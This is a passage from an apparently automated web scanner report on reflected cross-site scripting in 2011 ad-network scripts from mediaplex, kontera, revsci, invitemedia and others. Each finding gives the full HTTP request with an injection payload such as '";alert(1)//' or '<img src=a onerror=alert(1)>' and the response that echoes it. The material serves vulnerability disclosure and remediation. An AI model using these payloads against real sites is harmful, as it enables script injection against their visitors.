Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:01 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6890
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592f3f80';alert(1)//cf614ca88fe" target="_blank">
...[SNIP]...

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174b2"-alert(1)-"3864f9a6960 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:59 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6884
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "h
...[SNIP]...

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5874a"%3balert(1)//f4e52b4d717 was submitted in the mpjs parameter. This input was echoed as 5874a";alert(1)//f4e52b4d717 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D71643475874a"%3balert(1)//f4e52b4d717&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:07 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6800
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<script type=\"text/javascript\" src=\"http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=71643475874a";alert(1)//f4e52b4d717\">
...[SNIP]...

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54bb8'%3balert(1)//3d79a42824 was submitted in the mpvc parameter. This input was echoed as 54bb8';alert(1)//3d79a42824 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f54bb8'%3balert(1)//3d79a42824 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:19 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6882
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?54bb8';alert(1)//3d79a42824http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank">
...[SNIP]...

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe36"%3balert(1)//f0cdb562aed was submitted in the mpvc parameter. This input was echoed as 3fe36";alert(1)//f0cdb562aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f3fe36"%3balert(1)//f0cdb562aed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:17 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6886
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?3fe36";alert(1)//f0cdb562aed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||art
...[SNIP]...

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4693<script>alert(1)</script>358699d24a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J07717b4693<script>alert(1)</script>358699d24a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 11:03:13 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 11:03:13 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:13 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J07717B4693<SCRIPT>ALERT(1)</SCRIPT>358699D24A2" was not recognized.
*/

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc76"%3balert(1)//9f187d63db2 was submitted in the l parameter. This input was echoed as dcc76";alert(1)//9f187d63db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76"%3balert(1)//9f187d63db2&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1532

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
uestId="113351171490846325";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76";alert(1)//9f187d63db2&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");


4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c70"-alert(1)-"e6f81577124 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=099c70"-alert(1)-"e6f81577124&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1515

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
cardresearch.com/beacon.js"}]});
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=134803&layout=adlinks&sId=&cb=1305200317&creative=L&cn=us';
konaTweakMode=620822530;
konaRequestId="099c70"-alert(1)-"e6f81577124";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&dc_aff_id=");
onKonaRetur
...[SNIP]...

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 was submitted in the vid parameter. This input was echoed as 8aecd<img src=a onerror=alert(1)>a8888d3a2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null8aecd<img src=a onerror=alert(1)>a8888d3a2d5"; Expires=Fri, 11-May-2012 12:10:32 GMT
Content-Length: 63
Date: Thu, 12 May 2011 12:10:32 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null8aecd<img src=a onerror=alert(1)>a8888d3a2d5';


4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c73'%3balert(1)//a585ca03c5d was submitted in the admeld_callback parameter. This input was echoed as 89c73';alert(1)//a585ca03c5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match89c73'%3balert(1)//a585ca03c5d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:09 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 765

document.write('<img width="0" height="0" src="http://tag.admeld.com/match89c73';alert(1)//a585ca03c5d?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632369&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C500
...[SNIP]...

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><script>alert(1)</script>8c27d2a8f82 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=25886"><script>alert(1)</script>8c27d2a8f82&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
